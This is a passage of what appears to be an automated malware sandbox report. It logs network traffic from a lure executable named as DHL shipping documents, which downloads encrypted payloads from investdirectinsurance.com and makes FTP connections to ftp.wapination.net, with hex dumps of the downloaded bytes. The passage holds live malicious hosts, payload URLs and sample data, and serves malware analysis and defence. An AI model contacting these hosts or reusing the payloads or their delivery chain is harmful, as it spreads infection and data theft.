                                                        Aug 2, 2024 15:02:12.481318951 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.481318951 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.481924057 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.481956005 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.481981993 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.481991053 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.482013941 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.482033014 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.482130051 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.482191086 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.482741117 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.482795954 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.482841015 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.482888937 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.483120918 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.483189106 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.483602047 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.483650923 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.483848095 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.483896971 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.483942032 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.484025955 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.551167011 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.551219940 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.551302910 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.551326990 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.551358938 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.551384926 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.551445007 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.573103905 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.573147058 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.573256016 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.573275089 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.573307037 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.573405981 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.573458910 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.573987007 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.574023008 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.574064016 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.574068069 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:12.574114084 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.574126959 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.574291945 CEST49707443192.168.2.9172.67.189.102
                                                        Aug 2, 2024 15:02:12.574311018 CEST44349707172.67.189.102192.168.2.9
                                                        Aug 2, 2024 15:02:14.004463911 CEST4434970423.206.229.209192.168.2.9
                                                        Aug 2, 2024 15:02:14.004723072 CEST49704443192.168.2.923.206.229.209
                                                        Aug 2, 2024 15:02:14.727148056 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:14.732115984 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:14.732507944 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:15.256807089 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.257108927 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:15.262059927 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.372625113 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.372781038 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:15.377616882 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.577150106 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.579257965 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:15.585046053 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.696149111 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.696368933 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:15.701306105 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.813287020 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.813568115 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:15.818932056 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.929900885 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:15.932024002 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:15.937184095 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:16.068078041 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:16.069505930 CEST4970947808192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:16.074357986 CEST4780849709108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:16.074471951 CEST4970947808192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:16.074553967 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:16.079355001 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:16.545480013 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:16.550509930 CEST4970947808192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:16.550553083 CEST4970947808192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:16.555428982 CEST4780849709108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:16.556070089 CEST4780849709108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:16.556149960 CEST4970947808192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:16.595942974 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:16.680628061 CEST2149708108.179.234.136192.168.2.9
                                                        Aug 2, 2024 15:02:16.721031904 CEST4970821192.168.2.9108.179.234.136
                                                        Aug 2, 2024 15:02:17.174089909 CEST49677443192.168.2.920.189.173.11
                                                        Aug 2, 2024 15:02:23.982774973 CEST49704443192.168.2.923.206.229.209
                                                        Aug 2, 2024 15:02:23.982898951 CEST49704443192.168.2.923.206.229.209
                                                        Aug 2, 2024 15:02:23.983156919 CEST49712443192.168.2.923.206.229.209
                                                        Aug 2, 2024 15:02:23.983198881 CEST4434971223.206.229.209192.168.2.9
                                                        Aug 2, 2024 15:02:23.983283043 CEST49712443192.168.2.923.206.229.209
                                                        Aug 2, 2024 15:02:23.983475924 CEST49712443192.168.2.923.206.229.209
                                                        Aug 2, 2024 15:02:23.983491898 CEST4434971223.206.229.209192.168.2.9
                                                        Aug 2, 2024 15:02:23.987704039 CEST4434970423.206.229.209192.168.2.9
                                                        Aug 2, 2024 15:02:23.987787008 CEST4434970423.206.229.209192.168.2.9
                                                        Aug 2, 2024 15:02:24.602525949 CEST4434971223.206.229.209192.168.2.9
                                                        Aug 2, 2024 15:02:24.602597952 CEST49712443192.168.2.923.206.229.209
                                                        Aug 2, 2024 15:02:43.798448086 CEST4434971223.206.229.209192.168.2.9
                                                        Aug 2, 2024 15:02:43.798580885 CEST49712443192.168.2.923.206.229.209
                                                        Aug 2, 2024 15:02:56.768076897 CEST4970580192.168.2.9199.232.214.172
                                                        Aug 2, 2024 15:02:56.773600101 CEST8049705199.232.214.172192.168.2.9
                                                        Aug 2, 2024 15:02:56.773694038 CEST4970580192.168.2.9199.232.214.172

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Aug 2, 2024 15:02:09.493565083 CEST5234353192.168.2.91.1.1.1
                                                        Aug 2, 2024 15:02:09.541275024 CEST53523431.1.1.1192.168.2.9
                                                        Aug 2, 2024 15:02:14.369546890 CEST4998053192.168.2.91.1.1.1
                                                        Aug 2, 2024 15:02:14.720894098 CEST53499801.1.1.1192.168.2.9

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Aug 2, 2024 15:02:09.493565083 CEST192.168.2.91.1.1.10xc81bStandard query (0)investdirectinsurance.comA (IP address)IN (0x0001)false
                                                        Aug 2, 2024 15:02:14.369546890 CEST192.168.2.91.1.1.10xaf88Standard query (0)ftp.wapination.netA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Aug 2, 2024 15:02:09.541275024 CEST1.1.1.1192.168.2.90xc81bNo error (0)investdirectinsurance.com172.67.189.102A (IP address)IN (0x0001)false
                                                        Aug 2, 2024 15:02:09.541275024 CEST1.1.1.1192.168.2.90xc81bNo error (0)investdirectinsurance.com104.21.65.79A (IP address)IN (0x0001)false
                                                        Aug 2, 2024 15:02:14.720894098 CEST1.1.1.1192.168.2.90xaf88No error (0)ftp.wapination.netwapination.netCNAME (Canonical name)IN (0x0001)false
                                                        Aug 2, 2024 15:02:14.720894098 CEST1.1.1.1192.168.2.90xaf88No error (0)wapination.net108.179.234.136A (IP address)IN (0x0001)false
                                                        Aug 2, 2024 15:02:23.140566111 CEST1.1.1.1192.168.2.90x9531No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Aug 2, 2024 15:02:23.140566111 CEST1.1.1.1192.168.2.90x9531No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                        Aug 2, 2024 15:02:36.011159897 CEST1.1.1.1192.168.2.90x3c39No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Aug 2, 2024 15:02:36.011159897 CEST1.1.1.1192.168.2.90x3c39No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • investdirectinsurance.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.949706172.67.189.1024435836C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-08-02 13:02:10 UTC134OUTGET /assuence/litesolidCha/Mindwall.bl HTTP/1.1
                                                        User-Agent: Mozilla/5.0
                                                        Host: investdirectinsurance.com
                                                        Cache-Control: no-cache
                                                        2024-08-02 13:02:10 UTC685INHTTP/1.1 200 OK
                                                        Date: Fri, 02 Aug 2024 13:02:10 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 15872
                                                        Connection: close
                                                        etag: "3e00-66a9a0ac-21601;;;"
                                                        last-modified: Wed, 31 Jul 2024 02:25:48 GMT
                                                        accept-ranges: bytes
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYdbogyO1JnuKxub24vPl%2Fa6rmatZSTuTiZdUZmpY2MYuH%2F%2Bcgq5sAPqny8TNIcB8PxOXk73LHTT%2F4FnmkDSPCM7S%2FC1g%2BoSbgX04KW8AbGc06QMMnmRu6TDmDNCsfrnOl1zpqV4JdGUzFXB"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ace42c20c4b4276-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-08-02 13:02:10 UTC684INData Raw: 35 82 48 df d1 b7 68 af c0 60 cf f8 b7 0f 00 d0 61 e0 2f 64 7b 80 c0 28 7f df 50 b7 68 af 80 60 cf f8 77 8f 00 d0 df e0 2f 64 7b 80 c0 28 77 df 50 b7 68 af 80 60 cf f8 77 8f 00 d0 c0 e0 2f 64 a7 9f 5a d8 77 05 71 11 7a 01 81 79 f3 14 1e 49 d2 9e bf 70 1b 80 89 29 f4 53 6f 68 5d 93 8d d7 dc 62 98 52 4f 5d d5 1b bf b9 0b 74 00 de b6 24 92 6e 3c ed 85 a3 e1 58 ac f8 77 8f 00 d0 df e0 29 ee 7b 80 31 29 75 df 82 05 75 89 80 60 cf f8 77 8f 00 d0 90 e0 1c 74 c6 90 90 28 77 35 50 b7 68 aa 80 60 cf f8 77 8f 4e ad df e0 2f 74 7b 80 c0 22 77 df 50 b7 68 6f 80 62 cf f8 77 9f 00 d0 dc e0 2f 64 7b 80 c0 28 f6 df 50 b7 68 af 80 60 cf 24 77 8f 00 d2 df e0 2f 64 7b 80 c6 28 60 e4 50 b7 58 af 80 64 cf f8 77 8f 01 d0 df 10 2f 64 7b 80 c0 28 4f df 50 b7 68 af 80 60 cf f8 77
                                                        Data Ascii: 5Hh`a/d{(Ph`w/d{(wPh`w/dZwqzyIp)Soh]bRO]t$n<Xw){1)uu`wt(w5Ph`wN/t{"wPhobw/d{(Ph`$w/d{(`PXdw/d{(OPh`w
                                                        2024-08-02 13:02:10 UTC1369INData Raw: 77 d4 c3 c8 68 af 60 5f c4 06 72 8f 00 d3 34 ea 5f 56 06 42 c1 28 77 d4 c9 9f 04 a2 80 60 ca ed 73 88 db 08 df e0 3f 56 86 42 c3 28 77 d4 a8 57 6a 64 e0 14 cd 01 f2 89 d8 d0 df e6 5b 57 7b 80 22 8a 4c cc 78 df 68 af 20 34 ce f3 0a a8 02 5e b6 e0 2f e4 66 82 63 02 1f d9 50 b7 19 68 a1 6a ce f8 77 90 0d 57 d0 1c 70 56 26 46 26 14 e0 df 50 9f 4f 64 80 60 c9 4f 08 90 11 34 74 1e 20 20 8e 80 c0 68 4c c2 78 a8 68 af 60 6a c1 f8 77 90 0d 57 d4 9d 6f d5 e6 8e a4 d8 9f ca 78 ed 68 af 20 37 24 f8 77 98 cb 30 4d 9e 2f 64 07 91 c3 14 cf df 50 80 6b 60 c1 6a c9 f8 77 90 19 32 de 7d 42 64 7b 84 a4 98 75 c1 31 bc 9a af 80 48 cf fa ba b1 00 d0 dc ec 68 e6 66 8a 10 d9 77 df b0 b7 18 35 29 60 cf fc 08 88 11 32 be 12 2f 64 87 8d 47 29 4d ce 49 d0 84 a5 a8 4b cf f8 75 7d 19
                                                        Data Ascii: wh`_r4_VB(w`s?VB(wWjd[W{"Lxh 4^/fcPhjwWpV&F&POd`O4t hLxh`jwWoxh 7$w0M/dPk`jw2}Bd{u1Hhfw5)`2/dG)MIKu}
                                                        2024-08-02 13:02:10 UTC1369INData Raw: a4 09 4c 1e d5 8b 8c c8 e8 d8 ec 4c d7 50 b1 67 04 61 7f f0 c2 68 aa 68 60 cf f8 0a 8d 0c d0 b1 e0 2f 64 06 80 c0 39 77 d5 f0 97 78 af 80 70 c8 ec 8d 4a 82 b1 df e0 10 e4 4f 9b c0 28 0e 3c 18 b7 68 a9 70 54 cf 59 6a 8f 00 d3 d5 9d 2f e7 cf c9 c0 a8 41 df d0 d4 84 a4 a8 3c cf f8 f4 80 14 08 3a e0 2f e5 50 af 12 28 77 df c9 b2 e8 af a9 60 cf f8 72 8f 00 b4 df e4 5f b7 4f c3 ac a8 75 cf 79 b9 5e 6b 4c 63 c8 ec 8b 99 43 bc 37 10 1d 7c fb 98 67 95 20 e1 99 b8 75 df 60 3a cf f2 cc 8f 00 d0 34 50 5f 64 4f 80 c0 28 76 df 50 f0 68 ee b0 60 cf f6 8c 95 0e 5b 33 e0 2f e4 fb 98 0f f5 77 df b0 c2 98 3b f0 60 cf fc 74 bf de 8e df e0 00 15 ce 80 c3 94 4d 3e d0 b7 5a af 80 60 c4 f8 77 ac 00 5b 3b e0 2f e4 fb 3e 56 28 77 d4 f0 c2 68 aa 68 60 cf f8 0a 8d 08 d0 be e0 2f 64
                                                        Data Ascii: LLPgahh`/d9wxpJO(<hpTYj/A<:/P(w`r_Ouy^kLcC7|g u`:4P_dO(vPh`[3/w;`tM>Z`w[;/>V(whh`/d
                                                        2024-08-02 13:02:10 UTC1369INData Raw: db 89 00 d0 d9 1c 3f 16 b6 d0 74 be 4d c4 49 af bb 90 b5 d5 24 f2 73 88 11 d5 39 b4 68 e5 70 e9 69 28 0f cd 6c a0 18 aa 01 70 24 ea 08 b0 96 40 d6 1c 20 0f 7b 91 20 94 6e d0 d8 8f 04 e1 80 60 c9 f8 cc 56 00 d0 07 17 f0 74 7b 80 c4 65 44 28 50 b7 e8 ee 68 60 cf f6 7f 91 00 d0 dc 95 0a 64 7b 80 13 b3 83 df 50 9f 6c 13 80 60 cc 0e 4c 8f 00 d0 b8 e4 22 0e 7b 80 22 28 1e df 50 b7 99 a4 56 5a 1b 48 6f 8f 00 d1 47 5f 2f 64 07 40 47 a8 77 df 99 89 8f ed 80 60 c9 0e 9d 57 40 d0 df e2 0f af 7b 80 c1 24 78 d4 50 b7 bb 59 1d 7a cf f8 f4 99 4f 5b ff e0 2f e4 b8 5f c0 28 f7 3f be af 68 af 09 5c 97 01 77 8f 0a 0a 07 77 2e 64 7b 84 4b cd 77 df 30 b4 62 a0 80 60 27 87 db 85 00 d0 d9 95 0d a3 7f 80 c0 68 b1 2f 50 b7 e8 ef 46 08 cf f8 8b 4e de 09 df e0 10 0d b0 2f d0 28 77
                                                        Data Ascii: ?tMI$s9hpi(lp$@ { n`Vt{eD(Ph`d{Pl`L"{"(PVZHoG_/d@Gw`W@{$xPYzO[/_(?h\ww.d{Kw0b`'h/PFN/(w
                                                        2024-08-02 13:02:10 UTC1369INData Raw: b1 d4 0d 73 9c 7b 0e 28 56 08 8b 52 68 58 fa f6 14 5d 7a 97 19 a9 5e 8e 5b bb 76 0a 22 2f 3c f6 cd 90 2b 23 ca f6 38 1c 0e 52 18 3c b5 c6 59 bf 56 7b f6 28 58 f6 14 e2 29 22 cc 0f e1 1c 0f 9b 07 de ae dc f5 78 52 32 fd 98 84 8a 84 12 c8 82 b9 45 99 98 44 6f 8f 2f 7f 80 ce 4a ed 3b 54 e8 91 55 dc e2 c0 22 84 76 6b e8 09 5f fd 5c 88 d2 ce 8d e6 67 37 a9 94 f5 84 bc ca 23 a8 8c 64 ac 0f 50 4a 4f 9d d4 f2 4c 90 4b 0c 3e 31 13 ca 9e 7b 84 cb 84 d3 4d 66 9d 08 39 bb d4 9a 87 95 7b cd e8 40 09 d2 6f 29 23 d2 8c e0 4d 6a 92 1f 3e ae da 0a 87 79 0b ac 28 50 f7 0c 5e 2f 04 83 cd e8 5c 01 91 12 dd 73 89 ef 7f bc 2a fe 6f 2e e0 55 d2 28 22 86 4d e6 f9 52 92 1b 3e a7 d0 0f bd b8 2b f6 f0 58 0c 64 13 2e 63 ba 8f e3 cd 6a 63 1a 39 ae c6 f4 81 3c 6b ee 77 8b f5 f9 53 c6
                                                        Data Ascii: s{(VRhX]z^[v"/<+#8R<YV{(X)"xR2EDo/J;TU"vk_\g7#dPJOLK>1{Mf9{@o)#Mj>y(P^/\s*o.U("MR>+Xd.cjc9<kwS
                                                        2024-08-02 13:02:10 UTC1369INData Raw: 46 1a 4f 5a ed a0 fb 52 e6 79 31 b6 c4 5d f3 26 ef 8f 00 d0 f8 3c 11 6d 7a 80 c4 28 77 df 50 b7 98 af 80 60 5a 03 cd 8d 8e 8e 7f 5c 6a 2e 7b 80 c0 28 f4 df 02 b7 68 af f8 24 cf f8 4a 57 00 d0 a1 ef 2f 64 a8 8a c0 28 6d a9 22 8b 0e db 2d 37 cf f8 77 8f 0d 72 df e0 3f 64 7b 80 e6 7d 43 df e8 84 68 af 90 60 cf f8 4a 70 55 2c fc e0 2f 64 cf 8b c0 28 6b d8 50 b7 7b 98 ec 27 98 f8 77 8f 00 d0 df e0 1f 64 7b 90 b7 4f 76 3b 71 94 68 af 80 df c0 1d 77 92 00 d0 d0 e0 2f 64 2f 80 c0 28 cf df 50 b7 66 af 80 60 99 f8 77 8f ce d0 df e0 2a 64 7b 80 c2 28 77 df 48 b7 68 af 40 60 cf f8 72 8f 00 d0 30 e0 2f 64 7a 80 c0 28 76 df 50 b7 69 af 80 60 c8 f8 77 8f 10 d0 df e0 5f 64 7b 80 27 28 77 df 51 b7 68 af e0 60 cf f8 70 8f 00 d0 df e0 d5 e5 7a 80 c0 28 77 df b0 b7 03 ac 25
                                                        Data Ascii: FOZRy1]&<mz(wP`Z\j.{(h$JW/d(m"-7wr?d{}Ch`JpU,/d(kP{'wd{Ov;qhw/d/(Pf`w*d{(wHh@`r0/dz(vPi`w_d{'(wQh`pz(w%
                                                        2024-08-02 13:02:10 UTC1369INData Raw: 28 77 df 4b b7 7a a9 12 60 c0 f8 c1 81 00 d0 df e0 e8 64 39 90 e0 68 74 df 6c ec 68 af 80 60 30 f8 f3 90 2e d0 d0 e0 27 f6 7b 80 c0 28 4a df ab b7 9d af 81 60 7f 12 77 8f 00 d0 28 e0 f6 66 a4 80 c4 28 14 24 50 b7 68 af 93 60 6c f6 fd 8f 10 d0 bf 96 2f 64 7b 80 ac 28 0a df 3f cf 6a af b4 4a cf f8 77 8f 31 d0 a6 e8 c1 64 7a 80 88 e4 77 df 50 b7 5e af 09 10 db f8 70 8f a2 f3 df e0 2f 64 65 80 af 68 3d c8 51 b7 b2 ea 80 60 cf f8 04 8f 79 d0 5a e0 6f 64 7b 80 c0 28 70 df 4b b4 22 a6 25 50 c0 f8 77 8f 00 d0 c0 e0 e8 74 64 80 7c a8 76 df 11 9c 68 af 80 60 30 f8 78 8f 02 d6 dc e0 2a f7 7b 80 c0 28 4a dd 51 b7 bd ac c0 60 6c 16 77 8f 00 d0 26 e0 02 66 5a 88 c1 28 b0 22 50 b7 68 af 93 60 f8 f4 6c bf 04 d0 53 99 2f 64 7b 80 ac 28 3c c0 d3 cf e8 af fc 5a cf f8 77 8f
                                                        Data Ascii: (wKz`d9htlh`0.'{(J`w(f($Ph`l/d{(?jJw1dzwP^p/deh=Q`yZod{(pK"%Pwtd|vh`0x*{(JQ`lw&fZ("Ph`lS/d{(<Zw
                                                        2024-08-02 13:02:10 UTC1369INData Raw: 78 dc 50 b7 19 af 49 68 cf f8 70 8f 12 d6 df e0 1f 64 b4 84 c0 28 75 df 49 bf 68 af c0 60 06 e6 77 8f 14 d0 be ee 2f 64 87 80 24 69 77 df b1 b7 51 a2 80 60 ce f8 0b a0 00 d0 d1 e0 ae 14 7b 80 22 28 6d dc 50 b7 1b af 42 70 cf f8 f6 8f af d7 df e0 6f 64 7c 82 c0 28 76 df d9 bf 68 af 41 60 e5 fa 77 8f 10 d0 ef e9 2f 64 fb 80 42 68 77 df 51 b7 90 a1 80 60 c8 f8 b4 80 00 d0 d4 e0 9f e4 7b 80 c1 28 b9 cc 50 b7 6a af 65 68 cf f8 70 8f 7e 34 df e0 1f 64 5b 84 c0 28 74 df 8f ff 68 af 40 60 49 fc 77 8f 18 d0 c4 e2 2f 64 07 80 5b e9 77 df 51 b7 17 ae 80 60 c0 f8 e7 a8 00 d0 d8 e0 e7 e4 7b 80 c4 28 87 c2 50 b7 69 af bf 70 cf f8 72 8f 28 d1 df e0 3f 64 bc 9c c0 28 74 df f5 bf 68 af 81 60 f7 e6 77 8f 08 d0 59 e2 2f 64 7a 80 3f 19 77 df d0 b7 29 ac 80 60 c4 f8 7c 80 00
                                                        Data Ascii: xPIhpd(uIh`w/d$iwQ`{"(mPBpod|(vhA`w/dBhwQ`{(Pjehp~4d[(th@`Iw/d[wQ`{(Pipr(?d(th`wY/dz?w)`|
                                                        2024-08-02 13:02:10 UTC1369INData Raw: 1f 80 7e 6b 5c 77 87 56 1f 82 7a 33 fe bf 80 51 3c 51 62 a2 f5 cc d2 a5 07 5f 41 59 65 d4 1b 42 b8 3b 01 a9 2e d1 63 d0 60 7d a3 4f 1b 80 d3 3c c1 77 ad 89 a9 8b b5 1a 3d 7b 51 91 1d 61 73 23 b7 46 1c 15 47 9c 59 77 ad 85 9c 7e 56 09 3d 7b 51 91 bd d2 3d 8d 85 46 1c 55 0f 6e 99 9c 8f 91 8b 70 5a 21 4d d0 51 93 35 dc bc c4 85 68 10 38 11 6f 8b e9 8f 91 4c 8d 75 6b 9d d0 51 54 93 31 61 8c 85 68 10 8d 4f 92 4d e8 8f 91 ea f2 b8 31 cf d0 51 f2 6d 62 ba a5 85 68 10 4c 4b 9a 03 29 5a 91 ea 86 b6 3a ce d0 80 94 ac 50 7a 64 f6 46 98 9c 7b 6e 94 77 ad d8 6a 4c b9 79 4e f1 cb 8e 13 c2 df 45 ee 4c 3e 25 4e 60 92 3f 4b 5c 8b df 58 03 4c 9e de 8c 28 5c 74 45 c9 44 af 99 49 e1 52 d8 ad 91 cb f1 ba 63 4e 7b 51 d3 3d 01 a2 bd 85 68 10 25 77 61 8f 2c 5a 00 8c 81 ba 4b ee
                                                        Data Ascii: ~k\wVz3Q<Qb_AYeB;.c`}O<w={Qas#FGYw~V={Q=FUnpZ!MQ5h8oLukQT1ahOM1QmbhLK)Z:PzdF{nwjLyNEL>%N`?K\XL(\tEDIRcN{Q=h%wa,ZK
                                                        2024-08-02 13:02:10 UTC1369INData Raw: 3c 7d 00 e9 4e 39 59 01 d8 34 c0 6d 91 68 83 ad 0e db 2d 60 e2 49 5e 68 ce 9b 8f bd 7d 64 01 2e 8d 53 e2 71 5d 8d 8c d2 80 0b 9b 4b d8 5d de 1b 8b ba 0b c2 7b 34 48 52 02 b4 ec b7 e5 9d 85 29 14 9d 77 50 de 9a 8b b8 3b 64 80 35 0b a3 60 31 50 9e 35 5c 85 6b ea 8f 1e 6f c2 d0 8e dc 65 01 9e 3c d6 03 12 2d 50 dd f6 3f 2c 0f cf 5a 59 43 5f ce 81 b8 1b 40 7b 3c f5 72 a3 b4 23 a3 8c 9b 8d 07 92 f8 5b 61 c5 6f fd ba 0b ff 18 22 c0 e3 e2 79 9d c9 0e 39 cd 60 96 52 3e 76 55 1b 89 bc 4b fc 09 80 f7 63 d0 af 2d a9 e5 1e 80 29 92 43 6c 6b c5 ed 4c e0 41 fe 18 c4 f5 52 e2 6c 5d ab f6 9a 1d 57 ea 53 dd 7e c5 1c 8f b7 29 80 49 2e 89 63 51 df b5 ed cc 92 bc 0b 94 53 3e 69 ce ef f0 7c 5b fe 29 28 09 0b 77 ac 3d ab 54 38 1d 33 e0 42 5e 5d d4 9e 4c e0 41 fe 18 c1 8a d3 63
                                                        Data Ascii: <}N9Y4mh-`I^h}d.Sq]K]{4HR)wP;d5`1P5\koe<-P?,ZYC_@{<r#[ao"y9`R>vUKc-)ClkLARl]WS~)I.cQS>i|[)(w=T83B^]LAc


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.949707172.67.189.1024435836C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-08-02 13:02:11 UTC130OUTGET /assuence/litesolidCha/Pano.bl HTTP/1.1
                                                        User-Agent: Mozilla/5.0
                                                        Host: investdirectinsurance.com
                                                        Cache-Control: no-cache
                                                        2024-08-02 13:02:12 UTC689INHTTP/1.1 200 OK
                                                        Date: Fri, 02 Aug 2024 13:02:12 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 238592
                                                        Connection: close
                                                        etag: "3a400-66ac718b-21650;;;"
                                                        last-modified: Fri, 02 Aug 2024 05:41:31 GMT
                                                        accept-ranges: bytes
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RULSnnxpg7%2FGX01oq2tAvx8odyfFV%2F3SaT2dZUsM77iXj4eDaNDdiPVIDXiIvydqfATqeZXYYmHRUWNTCfSO1Wedy2io4GtEXZDotz%2FY%2FXanthR4gjBvVMXgtBQ9gMf%2F6ePvcVv0%2FG2%2BdmUX"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ace42ccceac42b5-EWR
                                                        alt-svc: h3=":443"; ma=86400
